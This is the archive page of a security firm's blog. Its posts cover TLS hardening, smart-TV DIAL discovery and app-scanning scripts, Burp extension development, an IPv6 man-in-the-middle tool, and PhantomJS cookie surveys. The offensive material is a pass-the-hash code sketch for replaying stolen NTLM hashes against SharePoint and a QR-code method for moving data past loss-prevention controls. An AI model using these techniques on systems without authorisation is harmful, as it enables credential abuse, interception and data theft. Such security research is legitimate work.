
Security Blog

Category Archives: Security Tools

One of the most common findings we discover on assessments is misconfiguration of SSL/TLS implementations. Cryptography is notorious for requiring very specific skills to configure correctly, and on top of that it tends to be a moving target: it seems like every other month there is a new vulnerability specific to SSL/TLS. We find that many organizations become overwhelmed responding to the seemingly constant stream of changes required to maintain a secure web server, or simply throw their hands in the air and stick with a “good enough” configuration that seems to work. However, choosing and using strong TLS configurations doesn’t have to be hard. We wanted to create an easy-to-digest reference for all your SSL/TLS needs.

We built tlsconfig.neohapsis.com as a living information hub for SSL/TLS secure configurations. We test it regularly against known vulnerabilities and update it accordingly. The configuration examples available on the site will help strengthen your site and will also minimize low and medium risk findings on security assessments. More importantly, by using these configurations that emphasize best practices you can minimize reactionary patches and emergency configuration changes, and reduce time, effort, and risk.

Why Is “Good Enough” Not Good Enough?

Defense in depth is a concept that comes up a lot in the security world, and it is just as important in SSL/TLS. The recent FREAK attack is a prime example of how a known-weak configuration that might currently be classed as a medium or low risk can suddenly become critical, resulting in downtime to fix and a fire drill for your system administrators. Over 12% of the most popular domains had to act quickly to patch a vulnerability rooted in a configuration that has been known bad practice for 15 years (in fact, over 8% are still vulnerable and scrambling to update).

This is just one of many examples of the very good reasons that cryptographers are a conservative bunch and regularly deprecate old configurations. In short: proactive, gentle movement to the most current best practice configurations prevents unnecessary emergency maintenance and reduces overall risk.

Old Habits Die Hard

Aspiring for the shiniest new ciphers and configurations may not always be the wisest business decision. Often security best practices can conflict with market realities. Historically, adoption of new web technologies, including SSL/TLS technologies, has been slow; they are usually dependent on either operating system upgrades or hardware purchases, which are costly and rely on the user base’s willingness to upgrade. The most common reason we hear for use of deprecated cipher suites and weak key strengths is legacy support for Windows XP.

However, since the release of Windows 7, Windows XP has seen a steady decline of use across the Internet. By the time Microsoft stopped enterprise support for Windows XP, usage was down to 12.68%. Today usage is down to 7.36% and will only continue to fall. On top of the falling usage of XP, IE 6 usage has flatlined at 0.2% of total browser usage across the Internet. Only 7 years ago, one out of every two browser requests was made by IE 6, and it was the driving force behind a lot of development decisions. Sites were required to support IE 6 because of its widespread use; today that is no longer the case. So, if your organization has historically made security choices for all users based on the low bar of XP/IE6 users, now may finally be the right time to revisit that decision. In fact, comparatively strong cryptography choices can still support browsers back to 2002 while allowing modern systems to take advantage of better ciphers.

Check out the strong, simple baseline configurations available on tlsconfig.neohapsis.com (or see their shiny A+ scan results on SSL Labs) and learn how you can easily choose modern cryptography for your servers.

This post introduces and describes aspects of “DIAL”, a protocol developed by Google and Netflix for controlling Smart TVs with smart phones and tablets. DIAL provides “second screen” features, which allow users to watch videos and other content on a TV using a smart phone or tablet. This article will review sample code for network discovery and enumerate Smart TV apps using this protocol.

Part 1: Discovery and Enumeration

Smart TVs are similar to other modern devices in that they have apps. Smart TVs normally ship with apps for YouTube(tm) and Netflix(tm), as well as many other built-in apps. If you have a smartphone, then maybe you’ve noticed that when your smartphone and TV are on the same network, a small square icon appears in some mobile apps, allowing you to play videos on the big TV. This allows you to control the TV apps from your smartphone. Using this setup, the TV is a “first screen” device, and the phone or tablet functions as a “second screen”, controlling the first screen.

DIAL is the network protocol used for these features and is a standard developed jointly between Google and Netflix. (See http://www.dial-multiscreen.org/ ). DIAL stands for “Discovery and Launch”. This sounds vaguely similar to other network protocols, namely “RPC” (remote procedure call). Basically, DIAL gives devices a way to quickly locate specified networked devices (TVs) and controlling programs (apps) on those devices.

Let’s take a look at the YouTube mobile application to see how exactly this magic happens. Launching the YouTube mobile app with a Smart TV on the network (turned on, of course) shows the magic square indicating a DIAL-enabled screen is available:

Square appears when YouTube app finds TVs on the network.

Clicking the square provides a selection menu where the user may choose which screen to play YouTube videos. Recent versions of the YouTube apps allow “one touch pairing” which makes all of the setup easy for the user:

Let’s examine the traffic generated by the YouTube mobile app at launch.

The YouTube mobile app sends an initial SSDP request to discover available first-screen devices on the network.

The sent packet is destined for a multicast address (239.255.255.250) on UDP port 1900. Multicast is useful because devices on the local subnet can listen for it, even though it is not specifically sent to them.

The YouTube app multicast packet contains the string “urn:dial-multiscreen-org:service:dial:1”. A Smart TV will respond to this request, telling YouTube mobile app its network address and information about how to access it.

A multicast search request from the YouTube mobile app looks like this:

Of course, the YouTube app isn’t the only program that can discover ready-to-use Smart TVs. The following is a DIAL discoverer in a few lines of Python. It waits 5 seconds for responses from listening TVs. (Note: the request sent in this script is minimal. The DIAL protocol specification has a full request packet example.)
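A minimal discoverer in that spirit might look like the following; the M-SEARCH fields and the five-second wait follow the description above, while the rest (socket options, buffer size) are assumptions:

```python
import socket

SSDP_ADDR = ("239.255.255.250", 1900)
DIAL_ST = "urn:dial-multiscreen-org:service:dial:1"

def build_msearch():
    # Minimal SSDP M-SEARCH request; the DIAL spec has a fuller example
    return ("M-SEARCH * HTTP/1.1\r\n"
            "HOST: 239.255.255.250:1900\r\n"
            "MAN: \"ssdp:discover\"\r\n"
            "MX: 2\r\n"
            "ST: " + DIAL_ST + "\r\n"
            "\r\n").encode("ascii")

def discover(timeout=5):
    # Send the multicast search, then collect responses until the timeout
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_msearch(), SSDP_ADDR)
    responses = []
    try:
        while True:
            data, addr = sock.recvfrom(4096)
            responses.append((addr[0], data.decode("utf-8", "replace")))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return responses

# e.g.:
# for ip, resp in discover():
#     print(ip, resp)
```

Responding TVs answer with an HTTP-over-UDP response whose LOCATION header points at a device description URL, which is where the rest of the enumeration starts.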

At this point, the YouTube mobile app will try to access the “apps” URL combined with the application name with a GET request to http://192.168.1.222:60151/apps/YouTube. A positive response indicates the application is available, and returns an XML document detailing some data about the application state and feature support:

Those of you who have been following along may have noticed how easy this has been. So far, we have sent one UDP packet and issued two GET requests. This has netted us:

The IP address of a Smart TV

The operating system of a Smart TV (Linux 2.6)

Two listening web services on random high ports.

A RESTful control interface to the TV’s YouTube application.

If only all networked applications/attack surfaces could be discovered this easily. What should we do next? Let’s make a scanner. After getting the current list of all registered application names (as of Sept 18, 2013) from the DIAL website, it is straightforward to create a quick and dirty scanner to find the apps on a Smart TV:

Some of those app names appear pretty interesting. (Note to self: Find all corresponding apps.) The scanner looks for URLs returning positive responses (200 result codes and some XML), and prints them out:
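The scanner’s logic is small enough to sketch; shown here in modern Python 3, with the apps URL taken from the example above and the registered-name list left to the reader:

```python
import urllib.error
import urllib.request

def app_url(base, name):
    # e.g. app_url("http://192.168.1.222:60151/apps", "YouTube")
    return "%s/%s" % (base.rstrip("/"), name)

def check_app(base, name, timeout=3):
    # A 200 with an XML body means the app is registered on the TV
    try:
        resp = urllib.request.urlopen(app_url(base, name), timeout=timeout)
        body = resp.read().decode("utf-8", "replace")
        return body if resp.getcode() == 200 else None
    except (urllib.error.URLError, OSError):
        return None

def scan(base, names):
    # Try each registered app name and keep only the hits
    found = {}
    for name in names:
        body = check_app(base, name)
        if body is not None:
            found[name] = body
    return found

# e.g.:
# for name, xml in scan("http://192.168.1.222:60151/apps", app_names).items():
#     print(name, xml)
```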

A lot of my work lately has involved assessing web services; some are relatively straightforward REST and SOAP type services, but some of the most interesting and challenging involve varying degrees of additional requirements on top of a vanilla protocol, or entirely proprietary text-based protocols on top of HTTP. Almost without fail, the services require some extra twist in order to interact with them; specially crafted headers, message signing (such as HMAC or AES), message IDs or timestamps, or custom nonces with each request.

These kinds of unusual, one-off requirements can really take a chunk out of assessment time. Either the assessor spends a lot of time manually crafting or tampering with requests using existing tools, or spends a lot of time implementing and debugging code to talk to the service, then largely throws it away after the assessment. Neither is a very good use of time.

Ideally, we’d like to write the least amount of new code in order to get our existing tools to work with the new service. This is where writing extensions to our preferred tools becomes massively helpful: a very small amount of our own code handles the unusual aspects of the service, and then we’re able to take advantage of all the nice features of the tools we’re used to as well as work almost as quickly as we would on a service that didn’t have the extra proprietary twists.

Getting Started With Burp Extensions

Burp is the de facto standard for professional web app assessments, and with the new extension API (released December 2012 in r1.5.01) a lot of the complexity in creating Burp extensions went away. Before that, the official API was quite limited and several different extension-building-extensions had stepped in to try to fill the gap (such as Hiccup, jython-burp-api, and Buby); each was individually useful, but collectively it all resulted in confusing and contradictory instructions for anyone getting started. Fortunately, the new extension API is good enough that developing directly against it (rather than some intermediate extension) is the way to go.

The official API supports Java, Python, and Ruby equally well. Given the choice I’ll take Python any day, so these instructions will be most applicable to the parseltongues. Getting set up to use or develop extensions is reasonably straightforward (the official Burp instructions do a pretty good job), but there are a few gotchas I’ll try to point out along the way.

1. Make sure you have a recent version of Burp (at least 1.5.01, but preferably 1.5.04 or later, where some of the early bugs were worked out of the extensions support), and a recent version of Java.

2. Download the latest Jython standalone jar. The filename will be something like “jython-standalone-2.7-b1.jar”. (Even though the 2.7 branch is in beta, I found it plenty stable for my use; make sure to get it so that you can use Python 2.7 features in your extensions.)

3. In Burp, switch to the Extender tab, then the Options sub-tab. Now, configure the location of the jython jar.

4. Burp indicates that it’s optional, but go ahead and set the “Folder for loading modules” to your Python site-packages directory; that way you’ll be able to make use of any system-wide modules in any of your custom extensions (requests, passlib, etc.). (NOTE: Some Burp extensions expect that this path will be set to their own module directory. If you encounter errors like “ImportError: No module named Foo”, simply change the folder for loading modules to point to wherever those modules exist for the extension.)

Note: Because of the way in which Jython and JRuby dynamically generate Java classes, you may encounter memory problems if you load several different Python or Ruby extensions, or if you unload and reload an extension multiple times. If this happens, you will see an error like:

java.lang.OutOfMemoryError: PermGen space

You can avoid this problem by configuring Java to allocate more PermGen storage, by adding a -XX:MaxPermSize option to the command line when starting Burp. For example:

java -XX:MaxPermSize=1G -jar burp.jar

5. At this point the environment is configured; now it’s time to load an extension. The default one in the official Burp example does nothing (it defines just enough of the interface to load successfully), so we’ll go one step further. Since several of our assessments lately have involved adding some custom header or POST body element (usually for authentication or signing), that seems like a useful direction for a “Hello World”. Here is a simple extension that inserts data (in this case, a timestamp) as a new header field and at the end of the body (as a Gist for formatting). Save it somewhere on disk.
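A sketch of such an extension against the official Jython API is below; the X-Timestamp header name and the ts body parameter are arbitrary choices for illustration, not part of any real service:

```python
import time

try:
    from burp import IBurpExtender, IHttpListener
except ImportError:
    # Stand-ins so the pure helper below can be exercised outside of Burp
    class IBurpExtender(object): pass
    class IHttpListener(object): pass

def add_timestamp(headers, body):
    # Pure helper: add a header line and append the timestamp to the body
    ts = str(int(time.time()))
    return headers + ["X-Timestamp: " + ts], body + "&ts=" + ts

class BurpExtender(IBurpExtender, IHttpListener):
    def registerExtenderCallbacks(self, callbacks):
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("Timestamp Hello World")
        callbacks.registerHttpListener(self)

    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        if not messageIsRequest:
            return  # only rewrite outbound requests
        request = messageInfo.getRequest()
        info = self._helpers.analyzeRequest(request)
        headers = list(info.getHeaders())
        body = self._helpers.bytesToString(request[info.getBodyOffset():])
        new_headers, new_body = add_timestamp(headers, body)
        messageInfo.setRequest(self._helpers.buildHttpMessage(
            new_headers, self._helpers.stringToBytes(new_body)))
```

In a real engagement the inserted value would be whatever the service demands, such as a signature or nonce computed from the request; the timestamp just keeps the example self-contained.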

6. To load it into Burp, open the Extender tab, then the Extensions sub-tab. Click “Add”, and then provide the path to where you downloaded it.

Test it out! Any requests sent from Burp (including Repeater, Intruder, etc) will be modified by the extension. Output is directed to the tabs in the Extender>Extensions view.

A request has been processed and modified by the extension (timestamps added to the header and body of the request). Since Burp doesn’t currently have any way to display what a request looks like after it has been edited by an extension, it usually makes sense to output the results to the extension’s tab.

This is a reasonable starting place for developing your own extensions. From here it should be easy to play around with modifying the requests however you like: add or remove headers, parse or modify XML or JSON in the body, etc.

It’s important to remember as you’re developing custom extensions that you’re writing against a Java API. Keep the official Burp API docs handy, and be aware of when you’re manipulating objects from the Java side using Python code. Java to Python coercions in Jython are pretty sensible, but occasionally you run into something unexpected. It sometimes helps to manually take just the member data you need from complex Java objects, rather than figuring out how to pass the whole thing around other python code.

To reload the code and try out changes, simply untick then re-tick the “Loaded” checkbox next to the name of the extension in the Extensions sub-tab (or CTRL-click).

Jython Interactive Console and Developing Custom Extensions

Between the statically-typed Java API and playing around with code in a regular interactive Python session, it’s pretty quick to get most of a custom extension hacked together. However, when something goes wrong, it can be very annoying to not be able to drop into an interactive session and manipulate the actual Burp objects that are causing your extension to bomb.

Fortunately, Marcin Wielgoszewski’s jython-burp-api includes an interactive Jython console injected into a Burp tab. While I don’t recommend developing new extensions against the unofficial extension-hosting-extensions that were around before the official Burp API (in 1.5.01), access to the Jython tab is a pretty killer feature that stands well on its own.

You can install the jython-burp-api just as with the demo extension in step 6 above. The extension assumes that the “Folder for loading modules” (from step 4 above) is set to its own Lib/ directory. If you get errors such as “ImportError: No module named gds”, then either temporarily change your module folder, or use the solution noted here to have the extension fix up its own path.
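The usual form of that fix is a couple of lines at the top of the extension that put its own Lib/ directory on the module search path; the function below is a generic sketch (the Lib/ directory layout is jython-burp-api’s):

```python
import os
import sys

def add_lib_path(extension_dir, lib="Lib"):
    # Prepend the extension's own Lib/ directory so imports like
    # 'import gds' resolve regardless of the "Folder for loading
    # modules" setting in Burp
    path = os.path.join(extension_dir, lib)
    if path not in sys.path:
        sys.path.insert(0, path)
    return path
```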

Once that’s working, it will add an interactive Jython shell tab into the Burp interface.

This shell was originally intended to work with the classes and objects defined in jython-burp-api, but it’s possible to pull back the curtain and get access to the exact same Burp API that you’re developing against in standalone extensions.

Within the pre-defined “Burp” object is a reference to the Callbacks object passed to every extension. From there, you can manually call any of the methods available to an extension. During development and testing of your own extensions, it can be very useful to manually try out code on a particular request (which you can access from the history via getProxyHistory() ). Once you figure out what works, then that code can go into your extension.

Objects from the official Burp Java API can be identified by their lack of help() strings and the obfuscated type names, but python-style exploratory programming still works as expected: the dir() function lists available fields and methods, which correspond to the Burp Java API.

Testing Web Services With Burp and SoapUI

When assessing custom web services, what we often get from customers is simply a spec document, maybe with a few concrete examples peppered throughout; actual working sample code, or real proxy logs are a rare luxury. In these cases, it becomes useful to have an interface that will be able to help craft and replay messages, and easily support variations of the same message (“Message A (as documented in spec)”, “Message A (actually working)”, “testing injections into field x”, “testing parameter overload of field y”, etc). While Burp is excellent at replaying and tampering with existing requests, the Burp interface doesn’t do a great job of helping to craft entirely new messages, or helping keep dozens of different variations organized and documented.

For this task, I turn to a tool familiar to many developers, but rather less known among pentesters: SoapUI. SoapUI calls itself the “swiss army knife of [web service] testing”, and it does a pretty good job of living up to that. By proxying it through Burp (File>Preferences>Proxy Settings) and using Burp extensions to programmatically deal with any additional logic required for the service, you can use the strengths of both and have an excellent environment for security testing against services. SoapUI Pro even includes a variety of web-service specific payloads for security testing.

The main SoapUI interface, populated for penetration testing against a web service. Several variations of a particular service-specific POST message are shown, each demonstrating and providing easy reproducibility for a discovered vulnerability.

If the service offers a WSDL or WADL, configuring SoapUI to interact with it is straightforward; simply start a new project, paste in the URL of the endpoint, and hit okay. If the service is a REST service, or some other mechanism over HTTP, you can skip all of the validation checks and simply start manually creating requests by ticking the “Add REST Service” box in the “New SoapUI Project” dialog.

Create, manage, and send arbitrary HTTP requests without a “proper” WSDL or service description by telling SoapUI it’s a REST service.

In addition to helping you create and send requests, I find that the SoapUI project file is an invaluable resource for future assessments on the same service; any other tester can pick up right where I left off (even months or years later) by loading my Burp state and my SoapUI project file.

Share Back!

This should be enough to get you up and running with custom Burp extensions to handle unusual service logic, and SoapUI to craft and manage large numbers of example messages and payloads. For Burp, there are tons of tools out there, including the official Burp examples, burpextensions.com, and more findable on GitHub. Make sure to share other useful extensions, tools, or tricks in the comments, or hit me up to discuss: @coffeetocode or @neohapsis.

The people that run The Internet have been clamoring for years for increased adoption of IPv6, the next generation Internet Protocol. Modern operating systems, such as Windows 8 and Mac OS X, come out of the box ready and willing to use IPv6, but most networks still have only IPv4. This is a problem because the administrators of those networks may not be expecting any IPv6 activity and only have IPv4 monitoring and defenses in place.

In 2011, Alec Waters wrote a guide on how to take advantage of the fact that Windows Vista and Windows 7 were ‘out of the box’ configured to support IPv6. Dubbed the “SLAAC Attack”, his guide described how to set up a host that advertised itself as an IPv6 router, so that Windows clients would prefer to send their requests to this IPv6 host router first, which would then resend the requests along to the legitimate IPv4 router on their behalf.

This past winter, we at Neohapsis Labs tried to recreate the SLAAC Attack to test it against Windows 8 and make it easy to deploy during our own penetration tests.

We came up with a set of standard packages and accompanying configuration files that worked, then created a script to automate this process, which we call “Sudden Six.” It can quickly create an IPv6 overlay network and the intermediate translation to IPv4 with little more than a base Ubuntu Linux or Kali Linux installation, an available IPv4 address on the target network, and about a minute or so to download and install the packages.

Windows 8 on Sudden Six

As with the SLAAC Attack described by Waters, this works against networks that only have IPv4 connectivity and do not have IPv6 infrastructure and defenses deployed. The attack establishes a transparent IPv6 network on top of the IPv4 infrastructure. Attackers may take advantage of Operating Systems that prefer IPv6 traffic to force those hosts to route their traffic over our IPv6 infrastructure so they can intercept and modify that communication.

To boil it down, attackers can conceivably (and fairly easily) weaponize an attack on our systems simply by leveraging this vulnerability. They could pretend to be an IPv6 router on your network and see all your web traffic, including data being sent to and from your machine. Even more lethal, the attacker could modify web pages to launch client-side attacks, meaning they could create fake websites that look like the ones you are trying to access, but send all data you enter back to the attacker (such as your username and password or credit card number).

As an example, we can imagine this type of attack being used to snoop on web traffic from employees browsing web sites.

The most extreme way to mitigate the attack is to disable IPv6 on client machines. In Windows, this can be accomplished manually in each Network Adapter Properties panel or with GPO. Unfortunately, this would hinder IPv6 adoption. Instead, we would like to see more IPv6 networks being deployed, along with the defenses described in RFC 6105 and the Cisco First Hop Security Implementation Guide. This includes using features such as RA Guard, which allows administrators to configure a trusted switch port that will accept IPv6 Router Advertisement packets, indicating the legitimate IPv6 router.

At DEF CON 21, Brent Bandelgar and Scott Behrens will be presenting this attack as well as recommendations on how to protect your environment. You can find a more detailed abstract of our talk here. The talk will be held during Track 2 on Friday at 2 pm. In addition, on Friday we will be releasing the tool on the Neohapsis Github page.

This is the first post in a series about gathering Web site reconnaissance with PhantomJS.

My first major engagement with Neohapsis involved compiling a Web site survey for a global legal services firm. The client was preparing for a compliance assessment against Article 29 of the EU Data Protection Directive, which details disclosure requirements for user privacy and usage of cookies. The scope of the engagement involved working with their provided list of IP addresses and domain names to validate their active and inactive Web sites and redirects, count how many first party and third party cookies each site placed, identify any login forms, and determine the presence of links to site privacy policy and cookie policy.

The list was extensive and the team had a hard deadline. We had a number of tools at our disposal to scrape Web sites, but as we had a specific set of attributes to look for, we determined that our best bet was to use a modern browser engine to capture fully rendered pages and try to automate the analysis. My colleague, Ben Toews, contributed a script towards this effort that used PhantomJS to visit a text file full of URLs and capture the cookies into another file. PhantomJS is a distribution of WebKit that is intended to run in a “headless” fashion, meaning that it renders Web pages and scripts like Apple Safari or Google Chrome, but without an interactive user interface. Instead, it runs on the command line and exposes an API for JavaScript for command execution. I was able to build on this script to build out a list of active and inactive URLs by checking the status callback from page.open and capture the cookies from every active URL as stored in page.cookies property.

Remember how I said that PhantomJS would render a Web page like Safari or Chrome? This was very important to the project as I needed to capture the Web site attributes in the same way a typical user would encounter the site. We needed to account for redirects from either the Web server or from JavaScript, and any first or third party cookies along the way. As it turns out, PhantomJS provides a way to capture URL changes with the page.onUrlChanged callback function, which I used to log the redirects and final destination URL. The page.cookies attribute includes all first and third party cookies without any additional work, as PhantomJS makes all of the needed requests and script executions already. Check out my version of the script in chs2-basic.coffee.

This is the command invocation. It takes two arguments: a text file with one URL per line and a file name prefix for the output files.

phantomjs chs2-basic.coffee [in.txt] [prefix]

This snippet writes out the cookies into a JSON string and appends it to an output file.

if status is 'success'
  # output JSON of cookies from page, one JSON string per line
  # format: url: (requested URL from input) pageURL: (resolved location from the PhantomJS "address bar") cookie: (object containing cookies set on the page)
  fs.write system.args[2] + ".jsoncookies", JSON.stringify({url: url, pageURL: page.url, cookie: page.cookies}) + "\n", 'a'

In a followup post, I’ll discuss how to capture page headers and detect some common platform stacks.

When assessing a Windows domain environment, the ability to “pass the hash” is invaluable. The technique was pioneered by Paul Ashton way back in ’97, and things have only gotten better since. Fortunately, we no longer need to patch Samba, but have reasonably functional tools like Pass-The-Hash Toolkit and msvctl.

The general approach of these tools is not to focus on writing PTH versions of every piece of Windows functionality, but rather to allow you to run Windows commands as another user. This means that instead of needing to patch Samba, we can just use msvctl to spawn cmd.exe and from there run the net use command. This approach has the obvious advantage of requiring far less code.

On a recent engagement, I was attempting to access SharePoint sites using stolen hashes. My first instinct was to launch iexplore.exe using msvctl and to try to browse to the target site. The first thing I learned is that in order to get Internet Explorer to do HTTP NTLM authentication without prompting for credentials, the site you are visiting needs to be in your “Trusted Sites Zone”. Four hours later, once you figure this out, IE will use HTTP NTLM authentication, with the hash specified by msvctl, to authenticate you to the web application. This was all great, except I was still getting a 401 from the webapp. I had authenticated, but the account I was using didn’t have permissions on the SharePoint site. No problem; I have stolen thousands of users’ hashes and one of them must work, right? But what am I going to do, use msvctl to launch a few thousand instances of IE and attempt to browse to the site with each? I think not…

I took the python-ntlm module, which allows for HTTP NTLM with urllib2, and added the ability to provide a hash instead of a password. This can be found here. Then, because urllib2 is one of my least favourite APIs, I decided to write a patch for the requests library to use the python-ntlm library. This fork can be found here. I submitted a pull request to the requests project and committed my change to python-ntlm. Hopefully both of these updates will be available from pip in the near future.

So, what does all this let you do? You can now do pass-the-hash authentication with Python’s request library:
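As a sketch (the import path for the NTLM auth plugin is an assumption about the patched fork, and the hash shown is just a placeholder; check the forks’ READMEs for the real names), passing a stolen hash in place of a password looks something like this:

```python
def hash_credential(nt_hash, lm_hash="aad3b435b51404eeaad3b435b51404ee"):
    # Pass-the-hash tools usually accept "LM:NT" in place of a password;
    # the default LM value is the standard empty-LM placeholder used when
    # only the NT hash was captured
    return "%s:%s" % (lm_hash, nt_hash)

def get_as_user(url, domain_user, nt_hash):
    # Import names here are assumptions about the patched libraries;
    # deferred into the function so the helper above has no dependencies
    import requests
    from requests.auth import HttpNtlmAuth

    auth = HttpNtlmAuth(domain_user, hash_credential(nt_hash))
    return requests.get(url, auth=auth)

# e.g.:
# resp = get_as_user("http://sharepoint.internal/", "CORP\\someuser",
#                    "31d6cfe0d16ae931b73c59d7e0c089c0")
# print(resp.status_code)
```

From here, iterating over a few thousand stolen hashes against the same URL is a for loop rather than a few thousand instances of IE.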

One last thing to keep in mind is that there is a difference between HTTP NTLM authentication and Kerberos HTTP NTLM authentication. This is only for the former.

I can’t say that I’m an expert in Data Loss Prevention (DLP), but I imagine it’s hard. The basic premise is to prevent employees or others from getting data out of a controlled environment, for example, trying to prevent the DBA from stealing everyone’s credit card numbers or the researcher from walking out the door with millions in trade secrets. DLP is even tougher in light of new techniques for moving confidential data undetected through a network. When I demonstrated how I could do it with QR Codes, I had to rethink DLP protections.

Some quick research informs me that the main techniques for implementing DLP are to monitor and restrict access to data both physically and from networking and endpoint perspectives. Physical controls might consist of putting locks on USB ports or putting an extra locked door between your sensitive environment and the rest of the world. Networking controls might consist of firewalls, IDS, content filtering proxies, or maybe just unplugging the sensitive network from the rest of the network and the internet.

Many security folks joke about the futility of this effort. It seems that a determined individual can always find a way around these mechanisms. To demonstrate, my co-worker, Scott Behrens, was working on a Python script to convert files to a series of QR Codes (2d bar codes) that could be played as a video file. This video could then be recorded and decoded by a cell-phone camera and and stored as files on another computer. However, it seemed to me that with the new JavaScript/HTML5 file APIs, all the work of creating the QR Code videos could be done in the browser, avoiding the need to download a Python script/interpreter.

Many security folks joke about the futility of this effort. It seems that a determined individual can always find a way around these mechanisms. To demonstrate, my co-worker, Scott Behrens, was working on a Python script to convert files to a series of QR Codes (2d bar codes) that could be played as a video file. This video could then be recorded and decoded by a cell-phone camera and stored as files on another computer. However, it seemed to me that with the new JavaScript/HTML5 file APIs, all the work of creating the QR Code videos could be done in the browser, avoiding the need to download a Python script/interpreter.

My encoder is fairly simple. It uses the file API to read in multiple files from the computer, uses Stuart Knightley’s JSZip library to create a single ZIP file, and then Kazuhiko Arase’s JavaScript QRCode Generator to convert this file into a series of QRCodes. It does this all in the browser without requiring the user to download any programs or transmit any would-be-controlled data over the network.

The decoder was a little less straightforward. I have been wanting to learn about OpenCV for a non-security-related side project, so I decided to use it for this. It turns out that it is not entirely easy to use and its documentation is somewhat lacking. Still, I persevered and wrote a Python tool to:

Pull images from the video and analyze their color.

Identify the spaces between frames of QRCodes (identified by a solid color image).

Decode each QRCode frame with ZBar and reassemble the original file.
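The OpenCV and ZBar plumbing aside, the frame bookkeeping those steps describe is plain logic; a sketch of it, operating on per-frame average colors (the solid separator color and tolerance are assumptions, not the tool’s actual values):

```python
def is_separator(avg_color, target=(255, 0, 0), tol=40):
    # A separator frame is (close to) one solid color, e.g. pure red
    return all(abs(c - t) <= tol for c, t in zip(avg_color, target))

def split_into_codes(frame_colors):
    # Group consecutive non-separator frames; each group is the set of
    # video frames showing one QRCode, ready to hand off to a decoder
    groups, current = [], []
    for color in frame_colors:
        if is_separator(color):
            if current:
                groups.append(current)
                current = []
        else:
            current.append(color)
    if current:
        groups.append(current)
    return groups
```

In the real tool the grouped items would be the frame images themselves (with one decode attempt per group), but the separator-splitting logic is the same.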

The tool seems to work pretty well. Between my crummy cellphone camera and some mystery frames that ZBar refuses to decode, it isn’t the most reliable tool for data transfer, but it serves to make a point. Feel free to download both the encoder and decoder from my GitHub Repo or check out the live demo and let me know what you think. I haven’t done any benchmarking of the data bandwidth, but it seems reasonable to use the tool for files several megabytes in size.

To speak briefly about preventing the use of tools like this for getting data off your network: as with most things in security, finding a balance between usability and security is the key. The extreme on the end of usability would be to keep an entirely open network without any controls to prevent or detect data loss. The opposite extreme would be to unplug all your computers and shred their hard drives. Considerations in finding the middle ground as it relates to DLP include:

The value of your data to your organization.

The value of your data to your adversaries.

The means of your organization to implement security mechanisms.

The means of your adversaries to defeat security mechanisms.

Once your organization has decided what its security posture should be, it can attempt to mitigate risk accordingly. What risk remains must be accepted. For most organizations, the risk presented by a tool like the one described above is acceptable. That being said, techniques for mitigating its risk might include:

Disallowing video capture devices in sensitive areas (already common practice in some organizations).

Writing IDS signatures for the JavaScript used to generate the QRCodes (this is hard because JS is easily obfuscated and packed).

Limiting access within your organization to sensitive information.

Trying to prevent the QRCode-creating portion of the tool from reaching your computers.